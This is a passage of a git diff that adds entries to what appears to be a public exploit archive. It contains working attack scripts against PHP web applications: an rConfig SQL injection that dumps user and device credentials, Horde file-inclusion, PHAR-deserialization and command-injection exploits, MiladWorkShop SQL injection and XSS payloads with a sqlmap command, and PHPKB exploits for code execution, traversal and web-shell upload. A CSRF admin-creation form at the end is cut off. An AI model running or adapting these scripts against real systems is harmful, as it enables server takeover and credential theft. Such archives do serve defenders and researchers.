+# [+] Extracting the current DB name :
+# rconfig2
+# [+] Extracting 10 first users :
+# admin:1:63a9f0ea7bb98050796b649e85481845
+# Maybe no more information ?
+# Maybe no more information ?
+# [snip]
+# [+] Extracting 10 first devices :
+# 127-0-0-1:127.0.0.1::ocdvulnpass:
+# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret
+# Maybe no more information ?
+# Maybe no more information ?
+# [snip]
+# Done
+ 
+
+#!/usr/bin/python3
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print ("rconfig 3.9 - SQL Injection PoC")
+if len(sys.argv) != 2:
+    print ("[+] Usage : ./rconfig_exploit.py https://target")
+    exit()
+
+vuln_page="/commands.inc.php"
+vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
+given_target = sys.argv[1]
+target =  given_target
+target += vuln_page
+target += vuln_parameters
+
+request = requests.session()
+dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)
+
+
+def extractDBinfos(myTarget=None,myPayload=None):
+	"""
+	Extract information from database
+	Args:
+		- target+payload (String)
+	Returns:
+		- payload result (String)
+	"""
+	result = ""
+	encoded_request = myTarget+myPayload
+	exploit_req = request.get(encoded_request)
+	if '[PWN]' in str(exploit_req.content):
+		result = str(exploit_req.content).split('[PWN]')[1]
+	else:
+		result="Maybe no more information ?"
+	
+	return result
+
+
+if dashboard_request.status_code != 404:
+	print ("[+] Triggering the payloads on "+given_target+vuln_page)
+	# get the db name
+	print ("[+] Extracting the current DB name :")
+	db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
+	db_name = extractDBinfos(target,db_payload)
+	print (db_name)
+    # DB extract users
+	print ("[+] Extracting 10 first users :")
+	for i in range (0, 10):
+            user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
+            user_h = extractDBinfos(target,user1_payload)
+            #print ("[+] Dump device "+str(i))
+            print (user_h)
+    # DB extract devices information
+	print ("[+] Extracting 10 first devices :")
+	for i in range (0, 10):
+            device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
+            device_h = extractDBinfos(target,device_payload)
+            #print ("[+] Dump device "+str(i))
+            print (device_h)
+    
+	print ("Done")
+	               
+else:
+    print ("[-] Please verify the URI")
+    exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/48209.py b/exploits/php/webapps/48209.py
new file mode 100755
index 000000000..704830834
--- /dev/null
+++ b/exploits/php/webapps/48209.py
@@ -0,0 +1,166 @@
+## exploit-inc-inclusion.py
+#!/usr/bin/env python3
+from horde import Horde
+import subprocess
+import sys
+
+TEMP_DIR = '/tmp'
+
+if len(sys.argv) < 5:
+    print('Usage: <base_url> <username> <password> <filename> <php_code>')
+    sys.exit(1)
+
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+filename = sys.argv[4]
+php_code = sys.argv[5]
+
+# log into the web application
+horde = Horde(base_url, username, password)
+
+# upload (delete manually) and evaluate the .inc file
+horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
+horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
+## exploit-inc-inclusion.py EOF
+
+
+
+## horde.py
+import re
+import requests
+
+class Horde():
+    def __init__(self, base_url, username, password):
+        self.base_url = base_url
+        self.username = username
+        self.password = password
+        self.session = requests.session()
+        self.token = None
+        self._login()
+
+    def _login(self):
+        url = '{}/login.php'.format(self.base_url)
+        data = {
+            'login_post': 1,
+            'horde_user': self.username,
+            'horde_pass': self.password
+        }
+        response = self.session.post(url, data=data)
+        token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
+        assert (
+            len(response.history) == 1 and
+            response.history[0].status_code == 302 and
+            response.history[0].headers['location'] == '/services/portal/' and
+            token_match
+        ), 'Cannot log in'
+        self.token = token_match.group(1)
+
+    def upload_to_tmp(self, filename, data):
+        url = '{}/turba/add.php'.format(self.base_url)
+        files = {
+            'object[photo][img][file]': (None, filename),
+            'object[photo][new]': ('x', data)
+        }
+        response = self.session.post(url, files=files)
+        assert response.status_code == 200, 'Cannot upload the file to tmp'
+
+    def include_remote_inc_file(self, path):
+        # vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
+        app = 'trean:trean_Block_Bookmarks'
+
+        # add one dummy bookmark (to be sure)
+        url = '{}/trean/add.php'.format(self.base_url)
+        data = {
+            'actionID': 'add_bookmark',
+            'url': 'x'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark'
+
+        # add bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark block'
+
+        # edit bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[template]': '../../../../../../../../../../../' + path
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the bookmark block'
+
+        # evaluate the remote file
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+        print(response.text)
+
+        # remove the bookmark block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the bookmark block'
+
+    def trigger_phar(self, path):
+        # vulnerable block (alternatively the same can be obtained by creating a
+        # bookmark with the PHAR path and clocking on it)
+        app = 'horde:horde_Block_Feed'
+
+        # add syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the syndicated feed block'
+
+        # edit syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[uri]': 'phar://{}'.format(path)
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the syndicated feed block'
+
+        # load the PHAR archive
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+
+        # remove the syndicated feed block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the syndicated feed block'
+## horde.py EOF
\ No newline at end of file
diff --git a/exploits/php/webapps/48210.py b/exploits/php/webapps/48210.py
new file mode 100755
index 000000000..692c092bb
--- /dev/null
+++ b/exploits/php/webapps/48210.py
@@ -0,0 +1,241 @@
+## exploit-phar-loading.py
+#!/usr/bin/env python3
+from horde import Horde
+import requests
+import subprocess
+import sys
+
+TEMP_DIR = '/tmp'
+WWW_ROOT = '/var/www/html'
+
+if len(sys.argv) < 5:
+    print('Usage: <base_url> <username> <password> <filename> <php_code>')
+    sys.exit(1)
+
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+filename = sys.argv[4]
+php_code = sys.argv[5]
+
+source = '{}/{}.phar'.format(TEMP_DIR, filename)
+destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually)
+temp = 'temp.phar'
+url = '{}/static/{}.php'.format(base_url, filename)
+
+# log into the web application
+horde = Horde(base_url, username, password)
+
+# create a PHAR that performs a rename when loaded and runs the payload when executed
+subprocess.run([
+    'php', 'create-renaming-phar.php',
+    temp, source, destination, php_code
+], stderr=subprocess.DEVNULL)
+
+# upload the PHAR
+with open(temp, 'rb') as fs:
+    phar_data = fs.read()
+    horde.upload_to_tmp('{}.phar'.format(filename), phar_data)
+
+# load the phar thus triggering the rename
+horde.trigger_phar(source)
+
+# issue a request to trigger the payload
+response = requests.get(url)
+print(response.text)
+## exploit-phar-loading.py EOF
+
+
+
+
+## create-renaming-phar.php
+#!/usr/bin/env php
+<?php
+
+// the __destruct method of Horde_Auth_Passwd eventually calls
+// rename($this->_lockfile, $this->_params['filename']) if $this->_locked
+class Horde_Auth_Passwd {
+    // visibility must match since protected members are prefixed by "\x00*\x00"
+    protected $_locked;
+    protected $_params;
+
+    function __construct($source, $destination) {
+        $this->_params = array('filename' => $destination);
+        $this->_locked = true;
+        $this->_lockfile = $source;
+    }
+};
+
+function createPhar($path, $source, $destination, $stub) {
+    // create the object and specify source and destination files
+    $object = new Horde_Auth_Passwd($source, $destination);
+
+    // create the PHAR
+    $phar = new Phar($path);
+    $phar->startBuffering();
+    $phar->addFromString('x', '');
+    $phar->setStub("<?php $stub __HALT_COMPILER();");
+    $phar->setMetadata($object);
+    $phar->stopBuffering();
+}
+
+function main() {
+    global $argc, $argv;
+
+    // check arguments
+    if ($argc != 5) {
+        fwrite(STDERR, "Usage: <path> <source> <destination> <stub>\n");
+        exit(1);
+    }
+
+    // create a fresh new phar
+    $path = $argv[1];
+    $source = $argv[2];
+    $destination = $argv[3];
+    $stub = $argv[4];
+    @unlink($path);
+    createPhar($path, $source, $destination, $stub);
+}
+
+main();
+## create-renaming-phar.php EOF
+
+
+## horde.py
+import re
+import requests
+
+class Horde():
+    def __init__(self, base_url, username, password):
+        self.base_url = base_url
+        self.username = username
+        self.password = password
+        self.session = requests.session()
+        self.token = None
+        self._login()
+
+    def _login(self):
+        url = '{}/login.php'.format(self.base_url)
+        data = {
+            'login_post': 1,
+            'horde_user': self.username,
+            'horde_pass': self.password
+        }
+        response = self.session.post(url, data=data)
+        token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
+        assert (
+            len(response.history) == 1 and
+            response.history[0].status_code == 302 and
+            response.history[0].headers['location'] == '/services/portal/' and
+            token_match
+        ), 'Cannot log in'
+        self.token = token_match.group(1)
+
+    def upload_to_tmp(self, filename, data):
+        url = '{}/turba/add.php'.format(self.base_url)
+        files = {
+            'object[photo][img][file]': (None, filename),
+            'object[photo][new]': ('x', data)
+        }
+        response = self.session.post(url, files=files)
+        assert response.status_code == 200, 'Cannot upload the file to tmp'
+
+    def include_remote_inc_file(self, path):
+        # vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
+        app = 'trean:trean_Block_Bookmarks'
+
+        # add one dummy bookmark (to be sure)
+        url = '{}/trean/add.php'.format(self.base_url)
+        data = {
+            'actionID': 'add_bookmark',
+            'url': 'x'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark'
+
+        # add bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark block'
+
+        # edit bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[template]': '../../../../../../../../../../../' + path
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the bookmark block'
+
+        # evaluate the remote file
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+        print(response.text)
+
+        # remove the bookmark block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the bookmark block'
+
+    def trigger_phar(self, path):
+        # vulnerable block (alternatively the same can be obtained by creating a
+        # bookmark with the PHAR path and clocking on it)
+        app = 'horde:horde_Block_Feed'
+
+        # add syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the syndicated feed block'
+
+        # edit syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[uri]': 'phar://{}'.format(path)
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the syndicated feed block'
+
+        # load the PHAR archive
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+
+        # remove the syndicated feed block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the syndicated feed block'
+## horde.py EOF
\ No newline at end of file
diff --git a/exploits/php/webapps/48215.sh b/exploits/php/webapps/48215.sh
new file mode 100755
index 000000000..4f6f24f5f
--- /dev/null
+++ b/exploits/php/webapps/48215.sh
@@ -0,0 +1,41 @@
+#!/bin/sh
+
+if [ "$#" -ne 4 ]; then
+    echo '[!] Usage: <url> <username> <password> <command>' 1>&2
+    exit 1
+fi
+
+BASE="$1"
+USERNAME="$2"
+PASSWORD="$3"
+COMMAND="$4"
+
+JAR="$(mktemp)"
+trap 'rm -f "$JAR"' EXIT
+
+echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2
+curl -si -c "$JAR" "$BASE/login.php" \
+    -d 'login_post=1' \
+    -d "horde_user=$USERNAME" \
+    -d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \
+    echo '[!] Cannot log in' 1>&2
+
+echo "[+] Uploading dummy file" 1>&2
+echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \
+    -F 'actionID=11' \
+    -F 'import_step=1' \
+    -F 'import_format=csv' \
+    -F 'notepad_target=x' \
+    -F 'import_file=@-;filename=x' \
+    -so /dev/null
+
+echo "[+] Running command" 1>&2
+BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)"
+curl -b "$JAR" "$BASE/mnemo/data.php" \
+    -d 'actionID=3' \
+    -d 'import_step=2' \
+    -d 'import_format=csv' \
+    -d 'header=1' \
+    -d 'fields=1' \
+    -d 'sep=x' \
+    --data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\"
\ No newline at end of file
diff --git a/exploits/php/webapps/48218.txt b/exploits/php/webapps/48218.txt
new file mode 100644
index 000000000..96dd4c69f
--- /dev/null
+++ b/exploits/php/webapps/48218.txt
@@ -0,0 +1,33 @@
+# Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection
+# Google Dork: Powered By MiladWorkShop VIP System
+# Date: 2020-03-03
+# Exploit Author: AYADI Mohamed
+# email : ayadi.mohamed@outlook.com
+# Vendor Homepage: https://miladworkshop.ir/
+# Software Link: https://miladworkshop.ir/vip.html
+# Version: 1.x
+# Tested on: Kali Linux (sqlmap)
+# CVE : N/A
+
+
+[ SQL injection exploitation ]
+
+Address : http://vip.target/forget
+Request Type : Post
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause
+Payload: lang=en AND 3-4400' OR 6146=6146-- ivGZ21=6 AND 000wM2X=000wM2X
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: lang=en AND 3' AND (SELECT 2915 FROM (SELECT(SLEEP(50)))StCO)-- vkVG21=6 AND 000wM2X=000wM2X
+
+example :
+sqlmap -u "http://vip.target/forget" --data lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X --random-agent --banner --ignore-prox --hex --level 3 --risk 3 --time-sec=6 --timeout 100 --tamper="between.py"
+
+
+[ XSS exploitation ]
+http://vip.target/%22%3E%3Cimg%20src=%22aa%22%20onerror=%22alert(1)%22%3E%3C
+
+#creetz to all Morrocans cyber security
\ No newline at end of file
diff --git a/exploits/php/webapps/48219.py b/exploits/php/webapps/48219.py
new file mode 100755
index 000000000..391c0cbdd
--- /dev/null
+++ b/exploits/php/webapps/48219.py
@@ -0,0 +1,37 @@
+# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-03-15
+# Exploit Author: Antonio Cannito
+# Vendor Homepage: https://www.knowledgebase-script.com/
+# Software Link: https://www.knowledgebase-script.com/pricing.php
+# Version: Multi-Language v9
+# Tested on: Windows 8.1 / PHP 7.4.3
+# CVE : CVE-2020-10389
+
+
+
+#!/usr/bin/env python3
+import argparse
+import requests
+
+
+#Parsing arguments
+parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php")
+parser.add_argument("url", type=str, help="PHPKB's base path")
+parser.add_argument("username", type=str, help="Superuser username")
+parser.add_argument("password", type=str, help="Superuser password")
+parser.add_argument("cmd", type=str, help="The command you want executed")
+args = parser.parse_args()
+
+session = requests.Session()
+#Perform login
+session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
+#Sending exploit code and downloading the file
+exp = """' . system("{}") . '""".format(args.cmd)
+data = {"putdown_for_maintenance": "no{}".format(exp), "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "tet@test.com", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
+url = args.url + "/admin/manage-settings.php"
+session.post(url, data=data)
+print(session.get(args.url + "admin/include/configuration.php").text.encode('utf-8'))
+#Resetting settings
+data = {"putdown_for_maintenance": "no{}", "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "tet@test.com", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
+session.post(url, data=data)
\ No newline at end of file
diff --git a/exploits/php/webapps/48220.py b/exploits/php/webapps/48220.py
new file mode 100755
index 000000000..346687f07
--- /dev/null
+++ b/exploits/php/webapps/48220.py
@@ -0,0 +1,34 @@
+# Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal
+# Google Dork: N/A
+# Date: 2020-03-15
+# Exploit Author: Antonio Cannito
+# Vendor Homepage: https://www.knowledgebase-script.com/
+# Software Link: https://www.knowledgebase-script.com/pricing.php
+# Version: Multi-Language v9
+# Tested on: Windows 8.1 / PHP 7.4.3
+# CVE : CVE-2020-10387
+##########################
+
+
+#!/usr/bin/env python3
+import argparse
+import requests
+import shutil
+
+#Parsing arguments
+parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10387 - Authenticated Arbitrary File Download in admin/download.php in Chadha PHPKB Standard Multi-Language 9")
+parser.add_argument("url", type=str, help="PHPKB's base path")
+parser.add_argument("username", type=str, help="Superuser username")
+parser.add_argument("password", type=str, help="Superuser password")
+parser.add_argument("file", type=str, help="The file you want to download (starting from PHPKB's base path)")
+args = parser.parse_args()
+
+session = requests.Session()
+#Perform login
+session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
+#Sending exploit code and downloading the file
+url = args.url + "/admin/download.php?called=ajax&act=backup-lang&file=../../" + args.file
+ext = url.split("/")[-1]
+with open(ext, 'wb') as file:
+    shutil.copyfileobj(session.get(url, stream=True).raw, file)
+del session
\ No newline at end of file
diff --git a/exploits/php/webapps/48221.py b/exploits/php/webapps/48221.py
new file mode 100755
index 000000000..a040d0bbe
--- /dev/null
+++ b/exploits/php/webapps/48221.py
@@ -0,0 +1,31 @@
+# Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-03-15
+# Exploit Author: Antonio Cannito
+# Vendor Homepage: https://www.knowledgebase-script.com/
+# Software Link: https://www.knowledgebase-script.com/pricing.php
+# Version: Multi-Language v9
+# Tested on: Windows 8.1 / PHP 7.4.3
+# CVE : CVE-2020-10386
+
+
+#!/usr/bin/env python3
+import argparse
+import requests
+from json import loads
+
+#Parsing arguments
+parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10386 - Remote Code Execution via .php file upload in admin/imagepaster/image-upload.php in Chadha PHPKB Standard Multi-Language 9")
+parser.add_argument("url", type=str, help="PHPKB's base path")
+parser.add_argument("username", type=str, help="Superuser/Writer/Translator/Editor username")
+parser.add_argument("password", type=str, help="Superuser/Writer/Translator/Editor password")
+parser.add_argument("command", type=str, help="The command you want to execute")
+args = parser.parse_args()
+
+session = requests.Session()
+#Perform login
+session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
+#Sending exploit code
+baseurl = loads(session.post(args.url + "/admin/imagepaster/image-upload.php", files={'file': "<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>"}, data={'action': 'imageinsert_upload', 'imgMime': 'image/php', 'imgName': '../js/index.png', 'imgParent': 'null'}).text)["url"]
+print("Visit this page to execute the command:\n" + baseurl + "?cmd=" + args.command)
+print("\nIf you want to execute other commands you can re-execute the exploit or visit this webpage, followed by the command you want executed:\n" + baseurl + "?cmd=")
\ No newline at end of file
diff --git a/exploits/php/webapps/48234.txt b/exploits/php/webapps/48234.txt
new file mode 100644
index 000000000..8c9a73dce
--- /dev/null
+++ b/exploits/php/webapps/48234.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.exagate.com/
+# Software Link: https://www.exagate.com/sysguard-6001
+# Version: SYSGuard 6001
+
+HTML CSRF PoC :
+
+<html>
+  <body>
+    <form action="http://target/kulyon.php" method="POST">
+      <input type="hidden" name="username" value="joke" />
+      <input type="hidden" name="password" value="159384" />
